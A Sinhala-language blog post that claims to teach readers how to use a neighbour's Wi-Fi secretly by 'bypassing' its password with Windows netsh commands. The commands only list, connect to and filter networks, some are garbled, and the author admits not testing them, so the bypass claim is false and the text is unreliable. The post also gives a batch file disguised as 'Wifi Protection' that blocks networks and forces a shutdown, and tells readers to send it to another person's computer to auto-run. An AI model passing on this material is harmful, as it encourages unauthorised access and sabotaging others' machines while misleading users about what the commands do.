Saturday, January 3, 2015

වයි-ෆයි නෙට්වර්ක් එකකට රිංගන විදිහ.....

කොහොමද කට්ටිය??? ඔන්න අද මම අරගෙන ආවා ඔයාලා හැමෝටම ගොඩාක් ඕනෙ වෙන දෙයක්!

එහා ගෙදර අංකල් ගෙදෙට්ට වයි-ෆයි අරගෙන නේද? ඒකෙන් අංකල් ට හොරා
 (👺) free ඉන්ටෙනෙට් යන්න ආසද? හරි එහෙනම් අපි දැන් බලමු හරියටම Password Bypass කරලා හැක් කරන්නේ නැතුව වයි-ෆයි  නෙට්වර්ක් එකකට රිංගන විදිහ.....
මං මෙව්ව කියලා දෙන්නේ අධ්යාපනික කටයුතු සඳහා පමණයි... (These things are EXTREAMLY for educational purposes only.... I'm not responsible for any damage regarding these...)

මේ වැඩේ කරන්න පුලුවන් වින්ඩෝස් පාවිච්චි කරන අයට විතරයි....

පියවර1
ස්ටාට් මෙනු එකෙන් Run කියන එක ක්ලික් කරන්න.... ඒකේ cmd කියලා ටයිප් කරලා Enter කරන්න... දැන් Command Prompt එක ඕපන් වේවි...

පියවර 2
මේ කෝඩ් එක ටයිප් කරලා Enter කරන්න.... එතකොට  අපිට රිංගන්න ඕනේ වයි-ෆයි නෙට්වර්ක් එක හරියටම බලාගන්න පුලුවන්.... ඒකේ Name එක කොපි කර ගන්න....
Netsh wlan show network mode = bassid

**කට්ටිය සොරි වෙන්න ඕනේ මගේ මේ දවස් වල ඉන්ටෙර්නෙට් නෑ.... එක නිසා මේ කමාන්ඩ් වැඩ කරන්නේ නැ...**

පියවර 3
දැන් මේ කෝඩ් එක ටයිප් කරන්න... ඕකේ කියන "Wifi_Name" තැනට අර කලින් කොපි කර ගත්තු Network Name  එක පේස්ට් කරන්න....
ඊට පස්සේ Enter කී එක ඔබන්න.....
Netsh wlan connect name=(wifi_name)
Netsh wlan connect name=Mynet sata1

පියවර 4
වැඩේ හරී.... බලන්න ඔයාට ඕනේ Wi-Fi එක Connect වෙයි....

මේ Commands වලිනුත් හැක් කොරනකොට ඔයාලට වැඩක් ගන්න පුලුවන්....

වයි-ෆයි නෙට්වර්ක් එක ඩිස්කනෙක්ට් කරන්න නම්,,
Netsh wlan disconnect 

ඔයා කනෙක්ට් කරපු නෙට්වර්ක් එකේ profile එක බලාගන්න නම්,,,,
Netsh wlan show profile 

ඒ බලපු Profile එක .XML කියන Format එකෙන් සේව් කරන්න නම්,,,
Netsh wlan export profile
Name=mynet sata1

නෙට්වර්ක් එකක් බ්ලොක් කරන්න නම්,,,,,
Netsh wlan add filter
Permission=block ssid=netgear
Networktype=Mynet sata1

බ්ලොක් කරපු නෙට්වර්ක් බලන්න නම්,,,,
Netsh wlan show blockednetworks


ඔය කියපුවට අමතරව ඔයාගේ වයි-ෆයි නෙට්වර්ක් එක කවුරු හරි හොරෙන් පාවිච්චි කරනවා නම් ඔයාට තියෙන්නේ මෙච්චරයි.....
මේ කෝඩ් එක ඔයා සැක කරන එකාගේ කොම්පියුටර් එකේ Command Prompt එකේ ටයිප් කරලා Enter කරන්න .... එහෙම බැරි නම් මේ විදිහට Batch File එකක් හදලා Auto-run වෙන විදියට send කරන්න... ඔය පහල තියෙන්නේ Batch File එකට ඔනේ කෝඩ් එක..... ඕක නෝට් පෑඩ් එකේ ටයිප් කරලා .bat කියන Extension එක යටතේ සේව් කරන්න.....

@echo
Color a
Title Wifi Protection 
Echo you're misusing a Wifi Network !!!
Echo Access Denied!
Netsh wlan add filter
Permission=denyall
Networktype=adhoc
Echo powered by Nima
Color c
Echo System Critical
Echo Shutting Down.....
Shutdown -s
Exit

එහෙනම් කට්ටියයය මං මෙව්ව කියලා දෙන්නේ අධ්යාපනික කටයුතු සඳහා පමණයි..... ඔව්ව අහුවෙන්නේ නැති වෙන්න පරිස්සමෙන් කර ගන්න.... ගිහින් එන්නම් ආයේ හමුවෙමු....

No comments:

Post a Comment